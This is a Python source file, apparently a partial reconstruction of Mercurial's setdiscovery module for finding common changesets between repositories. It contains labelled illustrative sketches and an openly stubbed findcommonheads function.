# setdiscovery.py - improved discovery of common nodesets for mercurial
# (recovered from /lib64/python3.9/site-packages/mercurial/__pycache__/setdiscovery.cpython-39.pyc)

"""
The algorithm works in the following way. You have two repositories: local and
remote. They both contain a DAG of changelists.

The goal of the discovery protocol is to find one set of nodes, *common*,
the set of nodes shared by local and remote.

One of the issues with the original protocol was latency: it could
potentially require lots of roundtrips to discover that the local repo was a
subset of remote (which is a very common case; you usually have few changes
compared to upstream, while upstream probably had lots of development).

The new protocol only requires one interface for the remote repo: `known()`,
which, given a set of changelists, tells you if they are present in the DAG.

The algorithm then works as follows:

 - We will be using three sets, `common`, `missing`, `unknown`. Originally
   all nodes are in `unknown`.
 - Take a sample from `unknown`, call `remote.known(sample)`
   - For each node that remote knows, move it and all its ancestors to `common`
   - For each node that remote doesn't know, move it and all its descendants
     to `missing`
 - Iterate until `unknown` is empty

There are a couple of optimizations. First, instead of starting with a random
sample of missing, start by sending all heads; in the case where the local
repo is a subset, you compute the answer in one round trip.

Then you can do something similar to the bisecting strategy used when
finding faulty changesets: instead of random samples, you can try picking
nodes that will maximize the number of nodes that will be
classified with them (since all ancestors or descendants will be marked as well).
"""

from __future__ import absolute_import

import collections
import random

from .i18n import _
from .node import nullrev
from . import (
    error,
    policy,
    util,
)
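

# The function below is a minimal, self-contained sketch of the protocol
# described in the docstring above, written against a toy DAG (a dict mapping
# each rev to a tuple of its parents) and a caller-supplied
# ``remote_known(revs) -> list[bool]`` callback standing in for the peer's
# ``known()`` command.  It is illustrative only and not part of Mercurial's
# implementation.
def _example_discovery_loop(parents, remote_known, samplesize=2):
    """classify every rev of a toy DAG as common or missing"""

    children = {}
    for rev, ps in parents.items():
        for p in ps:
            children.setdefault(p, set()).add(rev)

    def _closure(start, edges):
        # start plus everything reachable from it through ``edges``
        seen, stack = {start}, [start]
        while stack:
            for nxt in edges.get(stack.pop(), ()):
                if nxt not in seen:
                    seen.add(nxt)
                    stack.append(nxt)
        return seen

    unknown = set(parents)
    common, missing = set(), set()
    while unknown:
        sample = random.sample(sorted(unknown), min(samplesize, len(unknown)))
        for rev, known in zip(sample, remote_known(sample)):
            if known:
                common |= _closure(rev, parents)    # rev and all its ancestors
            else:
                missing |= _closure(rev, children)  # rev and all its descendants
        unknown -= common | missing
    return common, missing
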

def _updatesample(revs, heads, sample, parentfn, quicksamplesize=0):
    """update an existing sample to match the expected size

    The sample is updated with revs exponentially distant from each head of the
    <revs> set. (H~1, H~2, H~4, H~8, etc).

    If a target size is specified, the sampling will stop once this size is
    reached. Otherwise sampling will happen until roots of the <revs> set are
    reached.

    :revs:  set of revs we want to discover (if None, assume the whole dag)
    :heads: set of DAG head revs
    :sample: a sample to update
    :parentfn: a callable to resolve parents for a revision
    :quicksamplesize: optional target size of the sample"""
    dist = {}
    visit = collections.deque(heads)
    seen = set()
    factor = 1
    while visit:
        curr = visit.popleft()
        if curr in seen:
            continue
        d = dist.setdefault(curr, 1)
        if d > factor:
            factor *= 2
        if d == factor:
            sample.add(curr)
            if quicksamplesize and (len(sample) >= quicksamplesize):
                return
        seen.add(curr)

        for p in parentfn(curr):
            if p != nullrev and (not revs or p in revs):
                dist.setdefault(p, d + 1)
                visit.append(p)
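
# Hypothetical illustration of the walk above (not used by the module): on a
# linear DAG 0 <- 1 <- 2 <- 3 with the single head 3, the sample ends up
# holding the head plus ancestors at exponentially growing distances.
def _example_updatesample_usage():
    def parentfn(rev):
        return [rev - 1] if rev > 0 else [nullrev]

    sample = set()
    _updatesample(None, {3}, sample, parentfn)
    return sample  # {3, 2, 0} for this tiny DAG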


def _limitsample(sample, desiredlen, randomize=True):
    """return a random subset of sample of at most desiredlen items.

    If randomize is False, though, a deterministic subset is returned.
    This is meant for integration tests.
    """
    if len(sample) <= desiredlen:
        return sample
    if randomize:
        return set(random.sample(sample, desiredlen))
    sample = list(sample)
    sample.sort()
    return set(sample[:desiredlen])
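
# Hypothetical example: with randomize=False the smallest revs are kept, which
# keeps test output stable, e.g. _limitsample({10, 3, 7, 1}, 2, randomize=False)
# returns {1, 3}.
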

class partialdiscovery(object):
    """an object representing ongoing discovery

    Fed with data from the remote repository, this object keeps track of the
    current set of changesets in various states:

    - common:    revs also known remotely
    - undecided: revs we don't have information on yet
    - missing:   revs missing remotely
    (all tracked revisions are known locally)
    """

    def __init__(self, repo, targetheads, respectsize, randomize=True):
        self._repo = repo
        self._targetheads = targetheads
        self._common = repo.changelog.incrementalmissingrevs()
        self._undecided = None
        self.missing = set()
        self._childrenmap = None
        self._respectsize = respectsize
        self.randomize = randomize

    def addcommons(self, commons):
        """register nodes known as common"""
        self._common.addbases(commons)
        if self._undecided is not None:
            self._common.removeancestorsfrom(self._undecided)

    def addmissings(self, missings):
        """register some nodes as missing"""
        newmissing = self._repo.revs(b'%ld::%ld', missings, self.undecided)
        if newmissing:
            self.missing.update(newmissing)
            self.undecided.difference_update(newmissing)

    def addinfo(self, sample):
        """consume an iterable of (rev, known) tuples"""
        common = set()
        missing = set()
        for rev, known in sample:
            if known:
                common.add(rev)
            else:
                missing.add(rev)
        if common:
            self.addcommons(common)
        if missing:
            self.addmissings(missing)

    def hasinfo(self):
        """return True if we have any clue about the remote state"""
        return self._common.hasbases()

    def iscomplete(self):
        """True if all the necessary data have been gathered"""
        return self._undecided is not None and not self._undecided

    @property
    def undecided(self):
        if self._undecided is not None:
            return self._undecided
        self._undecided = set(self._common.missingancestors(self._targetheads))
        return self._undecided

    def stats(self):
        return {
            'undecided': len(self.undecided),
        }

    def commonheads(self):
        """the heads of the known common set"""
        return self._common.basesheads()

    def _parentsgetter(self):
        getrev = self._repo.changelog.index.__getitem__

        def getparents(r):
            # parents are stored in slots 5 and 6 of the index entry
            return getrev(r)[5:7]

        return getparents

    def _childrengetter(self):
        if self._childrenmap is not None:
            # the undecided set only shrinks, so the map computed for one
            # iteration can be reused by the next one
            return self._childrenmap.__getitem__

        # precompute the children of every undecided revision so that
        # _updatesample() can look them up with a plain dict access
        self._childrenmap = children = {}

        parentrevs = self._parentsgetter()
        revs = self.undecided

        for rev in sorted(revs):
            # always create an entry so lookups never miss
            children[rev] = []
            for prev in parentrevs(rev):
                if prev == nullrev:
                    continue
                c = children.get(prev)
                if c is not None:
                    c.append(rev)
        return children.__getitem__

    def takequicksample(self, headrevs, size):
        """takes a quick sample of size <size>

        It is meant for initial sampling and focuses on querying heads and close
        ancestors of heads.

        :headrevs: set of head revisions in local DAG to consider
        :size: the maximum size of the sample"""
        revs = self.undecided
        if len(revs) <= size:
            return list(revs)
        sample = set(self._repo.revs(b'heads(%ld)', revs))

        if len(sample) >= size:
            return _limitsample(sample, size, randomize=self.randomize)

        _updatesample(
            None, headrevs, sample, self._parentsgetter(), quicksamplesize=size
        )
        return sample

    def takefullsample(self, headrevs, size):
        revs = self.undecided
        if len(revs) <= size:
            return list(revs)
        repo = self._repo
        sample = set(repo.revs(b'heads(%ld)', revs))
        parentrevs = self._parentsgetter()

        # update from heads
        revsheads = sample.copy()
        _updatesample(revs, revsheads, sample, parentrevs)

        # update from roots
        revsroots = set(repo.revs(b'roots(%ld)', revs))
        childrenrevs = self._childrengetter()
        _updatesample(revs, revsroots, sample, childrenrevs)

        assert sample

        if not self._respectsize:
            size = max(size, min(len(revsroots), len(revsheads)))

        sample = _limitsample(sample, size, randomize=self.randomize)
        if len(sample) < size:
            more = size - len(sample)
            takefrom = list(revs - sample)
            if self.randomize:
                sample.update(random.sample(takefrom, more))
            else:
                takefrom.sort()
                sample.update(takefrom[:more])
        return sample


pure_partialdiscovery = partialdiscovery

partialdiscovery = policy.importrust(
    'discovery', member='PartialDiscovery', default=partialdiscovery
)


def findcommonheads(
    ui,
    local,
    remote,
    abortwhenunrelated=True,
    ancestorsof=None,
    audit=None,
):
    """Return a tuple (common, anyincoming, remoteheads) used to identify
    missing nodes from or in remote.

    The audit argument is an optional dictionary that a caller can pass. It
    will be updated with extra data about the discovery, which is useful for
    debugging.
    """
    # The compiled body is not reproduced in full.  Going by the configuration
    # keys and progress messages embedded in it, the function:
    #  - optionally sends the local heads in a first "query 1" roundtrip
    #    (b'devel', b'discovery.exchange-heads') and feeds the replies into a
    #    partialdiscovery object (the Rust PartialDiscovery when available),
    #  - loops, taking quick or full samples sized by the
    #    b'discovery.sample-size*' and b'discovery.grow-sample*' options and
    #    querying the remote's known() command until nothing is undecided,
    #  - records b'total-roundtrips' in ``audit``, and either aborts or warns
    #    ("repository is unrelated") when no common revision is found,
    #  - returns (common heads, anyincoming, remote heads).
    raise NotImplementedError
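

# A simplified, hypothetical sketch of the rounds that findcommonheads() drives
# with the helpers above: query the local heads first, then keep sampling the
# undecided set and feeding the peer's known() replies back into the discovery
# object.  The peer API usage is assumed for illustration; this is not a copy
# of the compiled body.
def _example_discovery_rounds(repo, remote, ownheads,
                              initialsamplesize=100, fullsamplesize=200):
    clnode = repo.changelog.node
    disco = pure_partialdiscovery(repo, ownheads, respectsize=False)

    # round 1: ask about our own heads; if the local repo is a subset of the
    # remote this settles everything in a single roundtrip
    sample = list(ownheads)
    disco.addinfo(zip(sample, remote.known([clnode(r) for r in sample])))

    while not disco.iscomplete():
        if disco.hasinfo():
            sample = disco.takefullsample(ownheads, size=fullsamplesize)
        else:
            sample = disco.takequicksample(ownheads, size=initialsamplesize)
        known = remote.known([clnode(r) for r in sample])
        disco.addinfo(zip(sample, known))
    return disco.commonheads()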